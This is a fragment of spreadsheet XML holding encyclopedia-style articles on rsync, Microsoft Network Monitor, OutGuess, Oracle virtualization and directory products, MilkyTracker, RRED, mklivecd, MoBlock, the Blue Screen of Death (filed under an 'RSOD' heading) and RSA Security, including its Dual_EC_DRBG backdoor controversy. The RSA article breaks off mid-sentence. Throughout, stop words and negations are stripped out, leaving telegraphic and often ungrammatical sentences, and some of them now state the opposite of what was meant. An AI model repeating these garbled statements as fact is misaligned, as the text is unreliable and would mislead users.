    <t>rsync utility efficiently transferring synchronizing files computer storage drive across networked computers comparing modification times sizes files. commonly found unix-like operating systems gpl-3.0-or-later license.rsync written single threaded application. rsync algorithm type delta encoding, used minimizing network usage. zlib used additional data compression, stunnel used security. rsync facility typically used synchronizing software repositories mirror sites used package management systems.rsync typically used synchronizing files directories different systems. example, command rsync local-file user@remote-host:remote-file run, rsync connect user remote-host. once connected, invoke remote host's rsync programs determine parts local file need transferred remote file matches local one. rsync also operate daemon mode (rsyncd), serving receiving files native rsync protocol (using "rsync://" syntax). history andrew tridgell paul mackerras wrote original rsync, first announced june 1996. similar function invocation rdist (rdist -c), created ralph campbell 1983 released berkeley software distribution. tridgell discusses design, implementation, performance rsync chapters ph.d. thesis 1999. currently maintained wayne davison.because flexibility, speed, scriptability rsync, become standard linux utility, included popular linux distributions. ported windows (via cygwin, grsync, sfu), freebsd, netbsd, openbsd, macos. similar scp, rsync requires specification source destination, least must local.generic syntax: file directory list multiple files directories) copy from, dest file directory copy square brackets indicate optional parameters. rsync synchronize unix clients central unix server using rsync/ssh standard unix accounts. used desktop environments, example efficiently synchronize files backup copy external hard drive. scheduling utility cron carry tasks automated encrypted rsync-based mirroring multiple hosts central server. examples command line mirror freebsd might look like: rsync -avz --delete ftp4.de.freebsd.org::freebsd/ /pub/freebsd/ apache http server supports rsync updating mirrors. rsync -avz --delete --safe-links rsync.apache.org::apache-dist /path/to/mirror preferred (and simplest) mirror putty website current directory rsync. rsync -auh rsync://rsync.chiark.greenend.org.uk/ftp/users/sgtatham/putty-website-mirror/ mimic capabilities time machine (macos); also time rsync machine (tym). make full backup system root directory: delete files directories, within directory, extremely fast: connection rsync process operates communicating another rsync process, sender receiver. startup, rsync client connects peer process. transfer local (that file systems mounted host) peer created fork, setting suitable pipes connection. remote host involved, rsync starts process handle connection, typically secure shell. upon connection, command issued start rsync process remote host, uses connection thus established. alternative, remote host runs rsync daemon, rsync clients connect opening socket port 873, possibly using proxy.rsync numerous command line options configuration files specify alternative shells, options, commands, possibly full path, port numbers. besides using remote shells, tunnelling used remote ports appear local server rsync daemon runs. those possibilities allow adjusting security levels state art, naive rsync daemon enough local network. algorithm determining files send default, rsync determines files differ sending receiving systems checking modification time size file. time size different systems, transfers file sending receiving system. requires reading file directory information, quick, miss unusual modifications change neither.rsync performs slower comprehensive check invoked --checksum. this forces full checksum comparison every file present systems. barring rare checksum collisions, avoids risk missing changed files cost reading every file present systems. determining parts file changed rsync utility uses algorithm invented australian computer programmer andrew tridgell efficiently transmitting structure (such file) across communications link receiving computer already similar, identical, version structure.the recipient splits copy file chunks computes checksums chunk: hash, weaker easier compute 'rolling checksum'. sends checksums sender. sender computes checksum rolling section version file size chunks used recipient's. while recipient calculates checksum chunks starting full multiples chunk size, sender calculates checksum sections starting address. rolling checksum calculated sender matches checksum calculated recipient, section candidate transmitting content section, location recipient's file instead. case, sender uses computationally expensive hash verify sender's section recipient's chunk equal. note section sender start address chunk recipient. this allows efficient transmission files differ insertions deletions. sender sends recipient parts file match, along information merge existing blocks recipient's version. this makes copies identical. rolling checksum used rsync based mark adler's adler-32 checksum, used zlib, based fletcher's checksum. sender's recipient's versions file many sections common, utility needs transfer relatively little data synchronize files. typical data compression algorithms used, files similar uncompressed different compressed, thus entire file need transferred. some compression programs, gzip, provide special "rsyncable" mode allows files efficiently rsynced, ensuring local changes uncompressed file yield local changes compressed file. rsync supports features significantly data transfers backup. they include compression decompression data block block using zlib, support protocols stunnel. variations rdiff utility uses rsync algorithm generate delta files difference file file (like utility diff, different delta format). delta file applied file turning file (similar patch utility). rdiff works well binary files. rdiff-backup script maintains backup mirror file directory either locally remotely network another server. rdiff-backup stores incremental rdiff deltas backup, possible recreate backup point.the librsync library used rdiff independent implementation rsync algorithm. rsync network protocol share code rsync application. used dropbox, rdiff-backup, duplicity, utilities.the acrosync library independent, cross-platform implementation rsync network protocol. unlike librsync, wire-compatible rsync (protocol version 30). released reciprocal public license used commercial rsync software acrosync.the duplicity backup software written python allows incremental backups simple storage backend services like local file system, sftp, amazon many others. utilizes librsync generate delta data signatures previous file versions, encrypting using gpg, storing backend. performance reasons local archive-dir used cache backup chain signatures, re-downloaded backend needed. macos 10.5 later, special --extended-attributes switch allows retaining much file metadata syncing machines supporting feature. this achieved transmitting resource fork along data fork.zsync rsync-like tool optimized many downloads file version. zsync used linux distributions ubuntu distributing fast changing beta image files. zsync uses http protocol .zsync files pre-calculated rolling hash minimize server load permit diff transfer network optimization. rclone open-source tool inspired rsync focuses cloud high latency storage. supports different providers provides rsync-like interface cloud storage. however, rclone support rolling checksums partial file syncing (binary diffs) cloud storage providers usually offer feature rclone avoids storing additional metadata. rsync applications also casync remote differential compression list port numbers grsync based rsync graphical user interface notes references external links official website rsync algorithm 1998-11-09 doctoral thesis introducing rsync algroithm rsync examples linux (how rsync)</t>
  </si>
  <si>
    <t>Microsoft Network Monitor</t>
  </si>
  <si>
    <t>microsoft network monitor deprecated packet analyzer. enables capturing, viewing, analyzing network data deciphering network protocols. used troubleshoot network problems applications network. microsoft network monitor (codenamed bloodhound) originally designed developed raymond patch, transport protocol network adapter device driver engineer microsoft manager development team. network monitor replaced microsoft message analyzer (mma discontinued 2019). history manager development team shared hardware-based analyzer time. netmon conceived hardware analyzer taken test reproduce networking bug, first windows prototype coded christmas holiday. first bytes netmon capture file format used validate file. values 'rtss' ray, tom, steve, steve first four members team. code originally written os/2 user interface; symbol placed device driver packet buffers kept received data could dumped within kernel debugger. netmon caused stir microsoft since networks e-mail encrypted time. only software engineers access hardware analyzers cost, netmon many engineers around company access network traffic free. request microsoft simple identification features added non-cryptographic password identification protocol named bloodhound-oriented network entity (bone) (created named raymond patch play codename bloodhound). network monitor complete overhaul earlier network monitor version. originally versions network monitor available microsoft products, systems management server (sms). fully featured product public parsers available free download. microsoft network monitor superseded microsoft message analyzer microsoft message analyzer retired 2019 features some features network monitor include following: process tracking grouping network conversation support public microsoft proprietary protocols simultaneous capture sessions wireless monitor mode supported wireless nics real-time capture display frames reassembly fragmented data sniffing promiscuous mode traffic read libpcap capture files access capture parsing engine references external links microsoft network monitor: download (archive) (download) windows server network monitor parsers blog forum support "information network monitor article. support. june 2014. 933741. experts codeplex open source parsers codeplex "how monitor network traffic windows server 2008". systems.microsoft message analyzer: download blog long, paul (sep 2012). "meet successor microsoft network monitor!". blog. forum support message analyzer (network monitor's successor) microsoft connectwindows protocol test suites github</t>
  </si>
  <si>
    <t>OutGuess</t>
  </si>
  <si>
    <t>outguess steganographic software hiding data redundant content data bits existing (media) files. handlers image files common netpbm jpeg formats, can, example, specifically alter frequency coefficients jpeg files. written published free software terms license. tested variety unix-like operating systems included standard software repositories popular linux distributions debian arch linux (via user repository) derivatives. method operation algorithm estimates capacity hidden data without distortions decoy data becoming apparent. outguess determines bits decoy data considers expendable distributes secret bits based shared secret pseudorandom pattern across redundant bits, flipping according secret data. jpeg images, outguess recompresses image user-selected quality level embeds secret bits least significant bits (lsb) quantized coefficients skipping zeros ones. subsequently, corrections made coefficients make global histogram discrete cosine transform (dct) coefficients match decoy image, counteracting detection chi-square attack based analysis first-order statistics. this technique criticized actually facilitates detection disturbing statistics. also, data embedded jpeg frequency coefficients poor robustness withstand jpeg reencoding. history outguess originally developed germany 1999 niels provos. 1999, andreas westfeld published statistical chi-square attack, detect common methods steganographically hiding messages lsbs quantized jpeg coefficients. response, provos implemented method exactly preserves histogram attack based. released february 2001 outguess version 0.2, backward compatible older versions. broken attack published 2002 uses statistics based discontinuities across jpeg block boundaries (blockiness) decoded image estimate lengths messages embedded outguess. gained popularity used first puzzle published cicada 3301 2012. outguess abandoned official website shut september 2015. fork called outguess rebirth (ogr) released 2013 laurent perch, fixes graphical user interface windows. after last version september 2015, also abandoned 2018 website went offline. november 2018, debian developer joao eriberto mota filho imported source code repository github continue development, since released minor versions include fixes several people. references external links historical official website https://github.com/eribertomota/outguess</t>
  </si>
  <si>
    <t>Oracle VM Server for SPARC</t>
  </si>
  <si>
    <t>logical domains (ldoms ldom) server virtualization partitioning technology sparc processors. first released microsystems april 2007. after oracle acquisition january 2010, product re-branded oracle server sparc version onwards. each domain full virtual machine reconfigurable subset hardware resources. domains securely live migrated servers running. operating systems running inside logical domains started, stopped, rebooted independently. running domain dynamically reconfigured remove cpus, ram, devices without requiring reboot. using dynamic resource management, resources automatically reconfigured needed. supported hardware sparc hypervisors hyperprivileged execution mode, introduced sun4v architecture. sun4v processors released october 2015 ultrasparc t2+, m10, systems based ultrasparc support logical domains versions 1.0-1.2. newer types t-series servers support older logical domains newer oracle server sparc product version later. these include: technically, virtualization product consists interdependent components: hypervisor sparc server firmware logical domains manager software installed solaris operating system running within control domain (see logical domain roles, below). because this, particular version logical domains (oracle server sparc) software requires certain minimum version hypervisor installed server firmware. logical domains exploits chip multithreading (cmt) nature "coolthreads" processors. single chip contains cores, core either four hardware threads (for ultrasparc eight hardware threads (for ultrasparc t2/t2+, sparc t3/t4 later) virtual cpus. cores execute instructions concurrently, core switches threads—typically thread stalls cache miss goes idle—within single clock cycle. this lets processor gain throughput lost cache misses conventional designs. each domain assigned threads executes instructions native speed, avoiding virtualization overhead privileged operation trap-and-emulate binary rewrite typical designs. each server support many domain hardware thread maximum 128. that's domains ultrasparc domains ultrasparc sparc t4-1, domains ultrasparc examples single-processor (single-socket) servers. servers ultrasparc sparc t3-t5 cpus support many logical domains number processors multiplied number threads limit 128. m-series servers subdivided physical domains ("pdoms"), host logical domains. typically, given domain assigned multiple threads cores additional capacity within single instance. threads, ram, virtual devices added removed domain administrator issuing command control domain. this change takes effect immediately without need reboot affected domain, immediately make added threads continue operating reduced resources. when hosts connected shared storage (san nas), running guest domains securely live migrated servers without outage (starting oracle server sparc version 2.1). process encrypts guest memory contents transmitted servers, using cryptographic accelerators available processors sun4v architecture. logical domain roles logical domains except roles assigned. there multiple roles logical domains perform control domain service domain domain root domain guest domaincontrol domain, name implies, controls logical domain environment. used configure machine resources guest domains, provides services necessary domain operation, virtual console service. control domain also normally acts service domain. service domains present virtual services, virtual disk drives network switches, domains. cases, guest domains perform bridged access services domains, usually domains directly connected physical devices. service domains provide virtual lans sans well bridge physical devices. disk images reside complete local physical disks, shared block devices, slices, even files contained local file system, shared export iscsi target. control service functions combined within domains, however recommended user applications within control service domains order protect domain stability performance. domains direct ownership bus, card bus, single root virtualization (sr-iov) function, providing direct access physical devices, network card controller. domain devices native performance applications, service domain share devices domains virtual devices. root domains direct ownership pcie "root complex" associated pcie slots. this used grant access physical devices. root domain also domain. there maximum root domains ultrasparc (niagara) servers, also must control domain. ultrasparc plus, sparc sparc servers many root domains, limited number pcie root complexes installed server. sparc servers root complex domains. multiple domains configured provide resiliency failures. guest domains operating system instance without performing roles, leverage services provided order applications. supported guest operating systems operating system supported vendor running within logical domains solaris 11/06 later updates, solaris releases. there operating systems officially supported, still capable running within logical domains: debian ports version opensolaris 2009.06 illumos-derived releases ubuntu linux server edition openbsd later wind river linux oracle linux sparc also oracle server logical partition references external links oracle announces latest version oracle server sparc oracle server sparc product page oracle oracle server sparc software fujitsu increasing application availability using oracle server sparc live migration feature logical domains community opensolaris.org oracle server sparc best practices dynamic resource management oracle.</t>
  </si>
  <si>
    <t>Oracle Internet Directory</t>
  </si>
  <si>
    <t>oracle internet directory (oid) directory service produced oracle corporation, functions compatible ldap version functionality makes following features available within oracle database environment: integration oracle subsequent databases ease administration scalable, multi-platform listing structure reliable safe intranet integration synchronization oid-based listings (also distributed applications) integration existing public certificates, digital wallets (e-wallets) entrance privileges co-existence ldap implementations oracle's directory integration platform (dip) administration tools, including: routing policies system management objects oracle directory manager (also known "oidadmin" "odm") technical support regarding quality services delegated administrative service implementation uses standard oracle database structures store internal tables. oracle version databases, default, many oracle ldap table stores tablespaces names beginning olts_ (and occasionally p1ts_) prefixes. relevant default schemas used include (for "oracle directory server") odscommon. operation control utility (oidctl) serves command-line tool starting stopping server. monitor process interprets executes oidctl commands. marketing comparing oracle internet directory competitors, oracle corporation stresses uses foundation oracle database; whereas many competing products (such oracle directory server enterprise edition novell edirectory) rely enterprise-strength relational database, instead embedded database engines similar berkeley integration oracle database makes many technologies available oracle database available oracle internet directory, improvements oracle makes database space instantly flow ldap implementation. marketing purposes, forms part oracle identity management suite oracle application server. distribution oracle database version included bundled extra facility. 2006 shipped oracle application server version 2007 oracle corporation makes recent version available part identity management-suite bundling oracle application server (10.1.4.0.1). oracle internet directory forms part oracle directory services (ods). also list ldap software oracle identity management oracle directory server enterprise edition references benchmarks million users sparc million users exalogic million users exadata billion users external links oracle internet directory product page installation guide</t>
  </si>
  <si>
    <t>MilkyTracker</t>
  </si>
  <si>
    <t>milkytracker free software multi-platform music tracker composing music module file formats.it clone attempts recreate module replay user experience popular program fasttracker special playback modes available improved amiga protracker compatibility. module tracking module composition "tracking" done control multichannel sample playback. instrument created arranging audio samples across keyboard range. instrument sequenced monophonic track contains note, volume effect data. pattern series tracks played back simultaneously. song created arranging patterns. features milkytracker able open several legacy music module formats able save .mod formats. like fasttracker, milkytracker contains sample editor instrument editor. envelope editor instrument editor allows creation many envelope points user definable envelope loop points. milkytracker also supports basic (velocity sensitive) note input midi. platform support milkytracker supports several operating systems hardware platforms. these include: microsoft windows: milkytracker runs windows windows 200x, vista 8.1, unix-like: milkytracker available linux, android, macos, openbsd, freebsd. amiga: port milkytracker exists amigaos, morphos aros. windows mobile: milkytracker windows mobile smartphones, pdas, pocket dayton navigation system running windows 4.2. android xbox gp2x history milkytracker based existing module replay engine. core, milkyplay, development since mid-90s, originally digitrakker .mdl player. milkytracker development started decade later pocket still fully operates rather humble pdas. milkytracker stay generation tracker. there plans modern tracker features would break compatibility fasttracker. also category:audio trackers references external links official website milkytracker github</t>
  </si>
  <si>
    <t>Mixed threat attack</t>
  </si>
  <si>
    <t>regarding computer security, mixed threat attack attack uses several different tactics infiltrate computer user's environment. mixed threat attack might include infected file comes spam received internet download. mixed threat attacks exploit multiple vulnerabilities system. launching multiple diverse attacks parallel, attacker exploit entry points single attack. because threats based multiple single-attacks, much harder detect. firewalls help types attacks; configured correctly, somewhat effective type attack. however, attack embedded inside application, longer able prevent typical techniques employed define multiple access threat signature represent identification virus removal software. these types techniques need employed host machine sometimes firewall intrusion detection system able detect attack.nimda code examples computer worms utilized mixed threat attacks. also computer security references</t>
  </si>
  <si>
    <t>Robust random early detection</t>
  </si>
  <si>
    <t>robust random early detection (rred) queueing disclipine network scheduler. existing random early detection (red) algorithm variants found vulnerable emerging attacks, especially low-rate denial-of-service attacks (ldos). experiments confirmed existing red-like algorithms notably vulnerable ldos attacks oscillating queue size caused attacks.the robust (rred) algorithm proposed improve throughput ldos attacks. basic idea behind rred detect filter attack packets normal algorithm applied incoming flows. rred algorithm significantly improve performance low-rate denial-of-service attacks. design robust (rred) detection filter block added front regular block router. basic idea behind rred detect filter ldos attack packets incoming flows feed algorithm. distinguish attacking packet normal packets critical rred design. within benign flow, sender delay sending packets loss detected (e.g., packet dropped). consequently, packet suspected attacking packet sent within short-range packet dropped. this basic idea detection algorithm robust (rred). algorithm robust (rred) algorithm rred-enque(pkt) rred-flowhash(pkt) tmax max(flow[f].t1, pkt.arrivaltime within [tmax, tmax+t*] reduce local indicator corresponding else increase local indicator flow[f].i maximum local indicators bins flow[f].i red-enque(pkt) pass block drops pkt.arrivaltime else flow[f].t1 pkt.arrivaltime drop(pkt) return f.t1 arrival time last packet flow dropped detection filter block. arrival time last packet flow dropped random early detection (red) block. tmax max(f.t1, t2). short time period, empirically chosen default rred algorithm. simulation code robust (rred) simulation code rred algorithm published active queue management denial-of-service attack (aqm&amp;dos) simulation platform. aqm&amp;dos simulation platform able simulate variety attacks (distributed dos, spoofing dos, low-rate dos, etc.) active queue management (aqm) algorithms (red, rred, sfb, etc.). automatically calculates records average throughput normal flows attacks facilitate analysis impact attacks normal flows algorithms. references external links aqm&amp;dos simulation platform recent publications low-rate denial-of-service (ldos) attacks recent publications random early detection (red) schemes recent publications active queue management (aqm) schemes</t>
  </si>
  <si>
    <t>Mklivecd</t>
  </si>
  <si>
    <t>mklivecd script linux distributions allows compile "snapshot" current hard drive partition data resides (all settings, applications, documents, bookmarks, etc.) compress 9660 cd-image. this allows easy backup user's data also makes easy create customized linux-distribution. some linux-distributions like pclinuxos include graphical frontend easier script usage. used amarok live dreamlinux mandriva linux ruby rails live unity linux live also live software remastering remastersys, similar tool (for debian/ubuntu) list remastering software external links mklivecd source code mklivecd project page (obsolete)</t>
  </si>
  <si>
    <t>MoBlock</t>
  </si>
  <si>
    <t>moblock free software blocking connections specified range hosts. moblock address filtering program linux similar peerguardian microsoft windows. development stopped favor phoenix labs' official peerguardian linux parts code merged peerguardian linux. also peerguardian iplist external links moblock homepage debian packages moblock peerguardian linux peerguardian project sourceforge</t>
  </si>
  <si>
    <t>RSOD</t>
  </si>
  <si>
    <t>blue screen death (bsod), officially known stop error blue screen error, error screen windows operating system displays event fatal system error. indicates system crash, operating system reached critical condition longer operate safely, e.g., hardware failure unexpected termination crucial process. history blue error screens around since beta version windows 1.0; windows found newer version expected, would generate blue screen white text saying "incorrect version", starting normally. final release (version 1.01), however, screen prints random characters result bugs windows logo code. crash screen, however; upon crashing, windows either locks exits dos. windows uses text-mode screen displaying important system messages, usually digital device drivers enhanced mode situations program could run. windows changed color screen black blue. windows also displays blue screen user presses ctrl+alt+delete combination programs unresponsive. prior versions, windows exits error condition severe enough. first blue screen death appeared windows (the first version windows family, released 1993) windows operating systems released afterwards. earliest version, error started stop:, hence became known "stop error." bsods caused poorly written device drivers malfunctioning hardware, faulty memory, power supply issues, overheating components, hardware running beyond specification limits. windows era, incompatible dlls bugs operating system kernel could also cause bsods. because instability lack memory protection windows bsods much common. incorrect attribution september 2014, several online journals, including business insider, dailytech, engadget, gizmodo, lifehacker, neowin, softpedia, techspot, register, verge incorrectly attributed creation blue screen death steve ballmer, microsoft's former ceo, citing article microsoft employee raymond chen, entitled "who wrote text ctrl+alt+del dialog windows 3.1?". article focused creation first rudimentary task manager windows 3.x, shared visual similarities bsod. follow-up september 2014, raymond chen complained widespread mistake, claimed responsibility revising bsod windows panned bgr.com "entirely fabricated scenario posited real". engadget later updated article correct mistake. formats bsods originally showed silver text royal blue background information current memory values register values. starting windows server 2012 (released september 2012), windows adopted cerulean background. windows initially used black background, starting build number 22000.348, switched dark blue background. preview builds windows windows windows server (available windows insider program) feature dark green background instead blue one. windows 3.1, support customizing color screen. windows family, however, color hard-coded.windows render bsods 80×25 text mode. bsods windows family initially used 80×50 text mode 720×400 screen. windows 2000, windows vista, bsods 640×480 screen resolution. windows 2000 used built-in kernel mode font vista, lucida console font. windows windows server 2012 segoe uefi machines, bsods highest screen resolution available. legacy bios machines, 1024×768 resolution default, also configured highest resolution available (via 'highestmode' parameter boot configuration data). windows versions 1607 later, uses format windows code leads microsoft support page tries troubleshoot issue step-by-step. windows windows family operating systems, blue screen death (referred "bug check" windows software development driver development documentation) occurs kernel driver running kernel mode encounters error cannot recover. this usually caused illegal operation performed. safe action operating system take situation restart computer. result, data lost, users given opportunity save text error screen contains code error symbolic name (e.g. "0x0000001e, kmode_exception_not_handled") along four error-dependent values parentheses help software engineers problem occurred. depending error code, display address problem occurred, along driver loaded address. under windows second third sections screen contain information loaded drivers stack dump, respectively. driver information three columns; first lists base address driver, second lists driver's creation date unix timestamp), third lists name driver.by default, windows create memory dump file stop error occurs. depending version, several formats saved ranging 64kb "minidump" (introduced windows 2000) "complete dump" effectively copy entire contents physical memory (ram). resulting memory dump file debugged later, using kernel debugger. windows, windbg debuggers debugging tools windows used. debugger necessary obtain stack trace, required ascertain true cause problem; information on-screen limited thus possibly misleading, hide true source error. default, windows configured save 64kb minidump encounters stop error, automatically reboot computer. because process happens quickly, blue screen seen instant all. users sometimes noted random reboot rather traditional stop error, aware issue windows reboots displays notification recovered serious error. this happens computer function called "auto restart" enabled, disabled control panel turn shows stop error. microsoft windows also configured send live debugging information kernel debugger running separate computer. stop error encountered live kernel debugger attached system, windows halt execution cause debugger break rather displaying bsod. debugger used examine contents memory determine source problem. bsod also caused critical boot loader error, operating system unable access boot partition incorrect storage drivers, damaged file system similar problems. error code situation stop 0x0000007b (inaccessible_boot_device). cases, memory dump saved. since system unable boot hard drive situation, correction problem often requires using repair tools found windows installation disc. details before windows server 2012, bsod displayed error name uppercase (e.g. apc_index_mismatch), hexadecimal error number (e.g. 0x00000001) four parameters. last shown together following format: error code (parameter parameter parameter parameter error name depending error number nature, all, some, even none parameters contain data pertaining went wrong, and/or happened. addition, error screens showed four paragraphs general explanation advice included technical data file name culprit memory addresses. with release windows server 2012, bsod changed, removing favor error name, concise description. windows added sad-emoticon (except japanese version). hexadecimal error code parameters still found windows event memory dumps. since windows build 14393, screen features code quick troubleshooting. windows build 19041 slightly changed text "your problem" "your device problem". windows windows community nickname given windows dos-based line operating systems, even though latter match nickname's naming scheme. blue screen death windows operating systems frequently experiences blue screen death main virtual device drivers report errors user. this version bsod, internally referred "_vwin32_faultpopup", gives user option either restart computer continue using windows. this behavior contrast windows versions bsod, prevents user using computer powered restarted (usually automatic). common bsod 80×25 screen operating system's reporting interrupt caused processor exception; serious form general protection fault dialog boxes. memory address error given error type hexadecimal number decimal). error codes follows: division fault startup error non-maskable interrupt shutdown error overflow trap bounds check fault invalid opcode fault "coprocessor available" fault double fault coprocessor segment overrun invalid task state segment fault present fault stack fault general protection fault page fault error message limit exceed coprocessor error fault alignment check faultreasons bsods include: problems occur incompatible versions dlls: windows loads dlls memory needed application programs; versions changed, next time application loads different application expects. these incompatibilities increase time software installed, main reasons freshly installed copy windows stable "old" one. faulty poorly written device drivers hardware incompatibilitiesdamaged hardware also cause bsod. windows bsod occurs system attempts access file "c:\con\con","c:\aux\aux",or"c:\prn\prn" hard drive. this could inserted website crash visitors' machines. march 2000, microsoft released security update resolve issue.one famous instance windows bsod occurred presentation windows beta given bill gates comdex april 1998: demo crashed bsod assistant, chris capossela, connected scanner demonstrate windows 98's support plug play devices. this event brought thunderous applause crowd gates replied (after nervous pause): "that must we're shipping windows yet." windows simplest version blue screen occurs windows (except pocket 2000 pocket 2002). blue screen windows similar windows similar screens stop errors comparable kernel panics macos, linux, unix-like systems, bugchecks openvms. windows 3.1, like versions macos, displays black screen death instead blue one. windows displays error screen raised advanced configuration power interface (acpi) host computer's bios encounters problem. bootloader first beta version windows vista also displays error screen event boot failure. xbox green screen death instead blue one. windows orange screen death appears driver incompatibility present.as mentioned earlier, insider builds windows server 2016 later, windows windows display green screen. also screens death guru meditation kernel panic purple screen death black screen death ring death references external links check code reference sysinternals bluescreen screen saver v3.2 blue screen death malwiki</t>
  </si>
  <si>
    <t>RSoD</t>
  </si>
  <si>
    <t>MoarVM</t>
  </si>
  <si>
    <t>moarvm (metamodel runtime virtual machine) virtual machine built 6model object system. built serve another backend raku. moarvm created allow greater efficiency parrot closer internal representation model system used raku. notably virtual machine first stable version rakudo released december 2015.work began moarvm march 2012; project first publicly announced following year 2013. march 2014, fastest virtual machine rakudo terms startup time build speed.moarvm available artistic license 2.0. external links official website moarvm github references</t>
  </si>
  <si>
    <t>RSA Security</t>
  </si>
  <si>
    <t>security llc, formerly security, inc. business rsa, american computer network security company focus encryption encryption standards. named initials co-founders, rivest, shamir leonard adleman, public cryptography algorithm also named. among products securid authentication token. bsafe cryptography libraries also initially owned rsa. known incorporating backdoors developed products. also organizes annual conference, information security conference. founded independent company 1982, security acquired corporation 2006 us$2.1 billion operated division within emc. when acquired dell technologies 2016, became part dell technologies family brands. march 2020, dell technologies announced selling security consortium, symphony technology group (stg), ontario teachers’ pension plan board (ontario teachers’) alpinvest partners (alpinvest) us$2.1 billion, price bought back 2006.rsa based bedford, massachusetts, regional headquarters bracknell (uk) singapore, numerous international offices. history rivest, shamir leonard adleman, developed encryption algorithm 1977, founded data security 1982. 1994, clipper chip crypto war. 1995, sent handful people across hall found digital certificates international, better known verisign. company called security dynamics acquired data security july 1996 dynasoft 1997. january 1997, proposed first challenges first public breaking message based data encryption standard. february 2001, acquired xcert international, inc., privately held company developed delivered digital certificate-based products securing e-business transactions. 2001, acquired international, inc., privately held company developed delivered smart card biometric authentication products. august 2001, acquired securant technologies, inc., privately held company produced cleartrust, identity management product. december 2005, acquired cyota, privately held israeli company specializing online security anti-fraud solutions financial institutions. april 2006, acquired passmark security. september 2006, stockholders approved acquisition company corporation $2.1 billion. 2007, acquired valyd software, hyderabad-based indian company specializing file data security 2009, launched share project. part project, bsafe libraries made available free. promote launch, programming competition us$10,000 first prize. march 2011, suffered security breach valuable secrets leaked, compromising security existing securid tokens. 2011, introduced cybercrime intelligence service designed help organizations identify computers, information assets identities compromised trojans online attacks. july 2013, acquired aveksa leader identity access governance sector september 2016, acquired became subsidiary dell infrastructure solutions group acquisition corporation dell technologies cash stock deal michael dell. february 2020, dell technologies announced intention sell $2.075 billion symphony technology group. anticipation sale symphony technology group, dell technologies made strategic decision retain bsafe product line. end, transferred bsafe products (including data protection manager product) customer agreements, including maintenance support, dell technologies july 2020. september 2020, symphony technology group (stg) completed acquisition dell technologies. became independent company, world’s largest cybersecurity risk management organizations. controversy securid security breach march 2011, disclosed attack two-factor authentication products. attack similar sykipot attacks, july 2011 communications hack, nightdragon series attacks. called advanced persistent threat. today, securid commonly used software token rather older physical tokens. relationship rsa's relationship changed years. reuters' joseph menn cybersecurity analyst jeffrey carr noted adversarial relationship. early years, leaders prominent advocates strong cryptography public use, bush clinton administrations sought prevent proliferation. almost years, i've going people fort meade. success company [rsa] worst thing happen them. them, we're real enemy, we're real target. system they're afraid u.s. adopted standard, would truly international, interoperable, unbreakable, easy-to-use encryption technology. things together synergistically threatening n.s.a.'s interests driving frenzy. mid-1990s, bidzos "fierce" public campaign clipper chip, encryption chip backdoor would allow u.s. government decrypt communications. clinton administration pressed telecommunications companies chip devices, relaxed export restrictions products used (such restrictions prevented security selling software abroad.) joined civil libertarians others opposing clipper chip among things, distributing posters foundering sailing ship words "sink clipper!" security also created challenges show widely used encryption breakable well-funded entities like nsa. relationship shifted adversarial cooperative bidzos stepped 1999, according victor chan, rsa's department engineering 2005: "when joined people labs, fighting nsa. became different company later on." example, reported accepted million 2004 deal nsa-designed dual drbg random number generator bsafe library, despite many indications dual_ec_drbg poor quality possibly backdoored. security later released statement dual_ec_drbg kleptographic backdoor: made decision dual drbg default bsafe toolkits 2004, context industry-wide effort develop newer, stronger methods encryption. time, trusted role community-wide effort strengthen, weaken, encryption. this algorithm multiple choices available within bsafe toolkits, users always free choose whichever best suits needs. continued using algorithm option within bsafe toolkits gained acceptance nist standard value fips compliance. when concern surfaced around algorithm 2007, continued rely upon nist arbiter discussion. when nist issued guidance recommending algorithm september 2013, adhered guidance, communicated recommendation customers discussed change openly media. march 2014, reported reuters also adapted extended random standard championed nsa. later cryptanalysis showed extended random security, rejected prominent standards group internet engineering task force. extended random however make nsa's backdoor dual_ec_drbg tens thousands times faster attackers dual_ec_drbg backdoor (presumably nsa), extended nonces extended random made part internal state dual_ec_drbg easier guess. only security's java version hard crack without extended random, since caching dual_ec_drbg output e.g. security's programming language version already made internal state fast enough determine. indeed, security implemented extended random java implementation dual_ec_drbg. dual_ec_drbg backdoor from 2004 2013, shipped security software—bsafe toolkit data protection manager—that included default cryptographically secure pseudorandom number generator, dual drbg, later suspected contain secret national security agency kleptographic backdoor. backdoor could made data encrypted tools much easier break nsa, would secret private backdoor. scientifically speaking, backdoor employs kleptography, essentially, instance diffie hellman kleptographic attack published 1997 adam young moti yung.rsa security employees aware, least, dual_ec_drbg might contain backdoor. three employees members ansi x9f1 tool standards guidelines group, dual_ec_drbg submitted consideration early 2000s. possibility random number generator could contain backdoor "first raised ansi meeting", according john kelsey, co-author nist 800-90a standard contains dual_ec_drbg. january 2005, employees cryptography company certicom—who also members x9f1 group—wrote patent application described backdoor dual_ec_drbg identical one. patent application also described three ways neutralize backdoor. these—ensuring arbitrary elliptic curve points used dual_ec_drbg independently chosen, smaller output length—were added standard option, though nsa's backdoored version large output length remained standard's default option. kelsey said knew implementers actually generated non-backdoored reports implementations using smaller outlet. nevertheless, nist included dual_ec_drbg 2006 nist 800-90a standard default settings enabling backdoor, largely behest officials, cited security's early random number generator argument inclusion. standard also unrelated backdoor) problem csprng predictable, gjøsteen pointed earlier 2006, gjøsteen call dual_ec_drbg cryptographically sound.ansi standard group members microsoft employees shumow niels ferguson made public presentation backdoor 2007. commenting shumow ferguson's presentation, prominent security researcher cryptographer bruce schneier called possible backdoor "rather obvious", wondered bothered pushing dual_ec_drbg included, general poor quality possible backdoor would ensure nobody would ever there seem general awareness security made default products 2004, snowden leak.in september 2013, york times, drawing snowden leaks, revealed worked "insert vulnerabilities commercial encryption systems, systems, networks, endpoint communications devices used targets" part bullrun program. vulnerabilities, times reported, dual_ec_drbg backdoor. with renewed focus dual_ec_drbg, noted security's bsafe used dual_ec_drbg default, previously widely known. after york times published article, security recommended users switch away dual_ec_drbg, denied deliberately inserted backdoor. security officials largely declined explain remove dubious random number generator flaws became known, implement simple mitigation nist added standard neutralize suggested later verified backdoor.on december 2013, reuters' joseph menn reported secretly paid security million 2004 dual_ec_drbg default csprng bsafe. story quoted former security employees saying alarms raised deal handled business leaders rather pure technologists". interviewed cnet, schneier called million deal bribe. officials responded "entered contract engaged project intention weakening rsa’s products." menn stood story, media analysis noted rsa's reply non-denial denial, denied company officials knew backdoor agreed deal, assertion menn's story make.in wake reports, several industry experts cancelled planned talks rsa's 2014 conference. among mikko hyppönen, finnish researcher f-secure, cited rsa's denial alleged million payment suspicious. hyppönen announced intention give talk, "governments malware authors", conference quickly reaction reports: trustycon, held block away conference.at 2014 conference, former security executive chairman coviello defended security's choice keep using dual_ec_drbg saying 